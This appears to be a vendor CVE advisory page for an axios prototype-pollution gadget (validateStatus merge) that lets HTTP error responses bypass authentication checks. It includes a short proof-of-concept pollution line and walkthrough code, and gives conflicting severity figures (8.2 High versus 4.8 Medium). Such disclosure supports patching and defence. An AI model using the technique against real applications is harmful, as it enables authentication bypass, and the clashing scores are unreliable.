🛡️ CVE-2026-42041 — axios

🟡 CVSS 4.8 — Medium ⚠️ Exploit Public CWE-1321 OSV
4.8
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Axios: Authentication Bypass via Prototype Pollution Gadget in validateStatus Merge Strategy

# Vulnerability Disclosure: Authentication Bypass via Prototype Pollution Gadget in validateStatus Merge Strategy

Summary

The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling.

The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () => true, all HTTP status codes are accepted as success.

Severity: High (CVSS 8.2)

Affected Versions: All versions (v0.x - v1.x including v1.15.0)

Vulnerable Component: lib/core/mergeConfig.js (mergeDirectKeys strategy) + lib/core/settle.js

CWE

  • CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
  • CWE-287: Improper Authentication

CVSS 3.1

Score: 8.2 (High)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

| Metric | Value | Justification |

|---|---|---|

| Attack Vector | Network | PP is triggered remotely |

| Attack Complexity | Low | Once PP exists, a single property assignment exploits this. Consistent with GHSA-fvcv-3m26-pcqx |

| Privileges Required | None | No authentication needed |

| User Interaction | None | No user interaction required |

| Scope | Unchanged | Impact within the application |

| Confidentiality | Low | 401 treated as success may expose data behind auth gates |

| Integrity | High | All error handling and auth checks are silently bypassed — application operates on invalid assumptions |

| Availability | None | The function works correctly (returns true), no crash |

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input.

If an attacker can pollute Object.prototype via any other library in the stack, Axios will automatically inherit the polluted validateStatus function during config merge. The in operator in mergeDirectKeys makes this property uniquely susceptible to prototype pollution compared to all other config properties.

Why validateStatus Is Uniquely Vulnerable

All other config properties use defaultToConfig2, which reads config2[prop] (traverses prototype). But validateStatus uses mergeDirectKeys, which uses the in operator:

```javascript

// mergeConfig.js:58-64 — mergeDirectKeys (ONLY used by validateStatus)

function mergeDirectKeys(a, b, prop) {

if (prop in config2) { // ← in traverses prototype chain!

return getMergedValue(a, b);

} else if (prop in config1) {

return getMergedValue(undefined, a);

}

}

// mergeConfig.js:94

const mergeMap = {

// ... all others use defaultToConfig2 ...

validateStatus: mergeDirectKeys, // ← ONLY property using this strategy

};

```

The in operator is a more aggressive prototype traversal than property access. While config2['validateStatus'] also traverses the prototype, the explicit in check makes the intent clearer and the vulnerability more direct.

Proof of Concept

1. The Setup (Simulated Pollution)

```javascript

Object.prototype.validateStatus = () => true;

```

2. The Gadget Trigger (Safe Code)

```javascript

// Application checks authentication via HTTP status codes

try {

const response = await axios.get('https://api.internal/admin/users');

// Developer expects: 401 → catch block → redirect to login

// Reality: 401 → treated as success → displays admin data

processAdminData(response.data); // Executes with 401 response body!

} catch (error) {

redirectToLogin(); // NEVER REACHED for 401/403/500

}

```

3. The Execution

```javascript

// mergeConfig.js:58 — 'validateStatus' in config2

// config2 = { url: '/admin/users', method: 'get' }

// 'validateStatus' in config2 → checks prototype → finds () => true → TRUE

// → getMergedValue(defaultValidator, () => true) → returns () => true

// settle.js:16 — ALL status codes resolve

const validateStatus = response.config.validateStatus; // () => true

if (!response.status || !validateStatus || validateStatus(response.status)) {

resolve(response); // 401, 403, 500 all resolve here!

}

```

4. The Impact

```

Before pollution:

HTTP 200 → resolve (success)

HTTP 401 → reject (auth error) → redirectToLogin()

HTTP 403 → reject (forbidden) → showAccessDenied()

HTTP 500 → reject (server error) → showErrorPage()

After pollution:

HTTP 200 → resolve (success)

HTTP 401 → resolve (SUCCESS!) → processAdminData() with error body

HTTP 403 → resolve (SUCCESS!) → application thinks user has access

HTTP 500 → resolve (SUCCESS!) → application processes error as dat

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is high, an attacker needs no privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality low, integrity low, availability none.

Weakness class

CVE-2026-42041 is classified as CWE-1321: Prototype Pollution. Attacker input can modify an object prototype, changing behaviour for objects across the application.

Affected software

CVE-2026-42041 is recorded against 1 package.

  • axios

Timeline and source

Published on 5 May 2026 and last revised on 10 August 2026. A public exploit is known to exist, which raises the urgency of patching considerably. Record sourced from OSV.

References

github.com (Web)
nvd.nist.gov (Advisory)
github.com (Package)

CVE-2026-42041 on other distributions

Each distribution ships its own build and its own fixed version. Pick the one you run:

Details

Severity MEDIUM
CVSS Score 4.8
CVSS Vector CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
CWE CWE-1321
Public Exploit ⚠️ Yes
Source OSV
Published 2026-05-05
Updated 2026-08-12
Modified 2026-08-10
Fix URL N/A

Affected Packages

Software From version Fixed in
axios

Exploit Protection

Are you running axios?

CVE-2026-42041 carries CVSS 4.8 Medium rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-42041 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.